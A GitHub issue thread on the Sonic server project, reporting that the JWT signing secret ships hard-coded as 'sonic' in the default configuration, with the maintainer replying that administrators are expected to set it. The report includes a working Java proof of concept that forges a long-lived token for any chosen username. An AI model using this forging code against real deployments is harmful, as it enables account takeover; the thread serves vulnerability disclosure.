### ISSUE TITLE
[Bug] jwt secert_key硬编码

### ISSUE THREAD

**Issue by wa1ki0g** [SonicCloudOrg/sonic-server#393]
### Search before asking

- [X] I searched in the issue and found nothing similar. | 我查找了并确认issue列表无相似报告。

### Sonic version

all

### Deploy platform

all

### Minimal reproduce step

jwt的secert_key被硬编码在默认的配置文件里,导致可伪造成任意用户进行登录
The secret_key of jwt is hard-coded in the default configuration file, which may cause any user to log in.

<img width="1118" alt="image" src="https://github.com/SonicCloudOrg/sonic-server/assets/70200814/6252f60b-46d2-468c-a680-2f2bc113f544">

使用如下代码，可生成一个任意有效时间、任意用户的token：
Using the following code, you can generate a token valid for any time and for any user:

import java.util.Calendar;
import java.util.Date;
import java.util.UUID;
import com.auth0.jwt.JWT;
import com.auth0.jwt.JWTVerifier;
import com.auth0.jwt.algorithms.Algorithm;
import com.auth0.jwt.exceptions.JWTDecodeException;

public class JWTTokenTool {

    private String TOKEN_SECRET = "sonic" ;
    private int EXPIRE_DAY = 14;
    public String getToken(String username) {

        Calendar now = Calendar.getInstance();
        now.add(Calendar.DATE, EXPIRE_DAY);
        Date nowTime = now.getTime();

        return JWT.create().withAudience(username, UUID.randomUUID().toString())
                .withExpiresAt(nowTime)
                .sign(Algorithm.HMAC256(TOKEN_SECRET));

    }

    public String getToken(String username, int day) {

        Calendar now = Calendar.getInstance();
        now.add(Calendar.DATE, day);
        Date nowTime = now.getTime();
        return JWT.create().withAudience(username, UUID.randomUUID().toString())

                .withExpiresAt(nowTime)
                .sign(Algorithm.HMAC256(TOKEN_SECRET));

    }

    public static void main(String[] args) {

        JWTTokenTool Jwt = new JWTTokenTool();
        System.out.println(Jwt.getToken("QianHao.Yu"));

    }

}

### Are you willing to submit a PR?

- [ ] I'm willing to submit a PR! | 我将发起PR！

**Comment by ZhouYixun** [comment]
这个key本来就是管理员需要设置的，这里只是给了默认的值。正常得改成长加密串

**Comment by ZhouYixun** [comment]
而且这个key并不会打包到源码里面，只是docker部署时读取本地的env配置，详细的你可以看一下部署文档

![image](https://github.com/SonicCloudOrg/sonic-server/assets/56339314/d1a4e300-d4c4-4a96-bae6-7d1744553599)
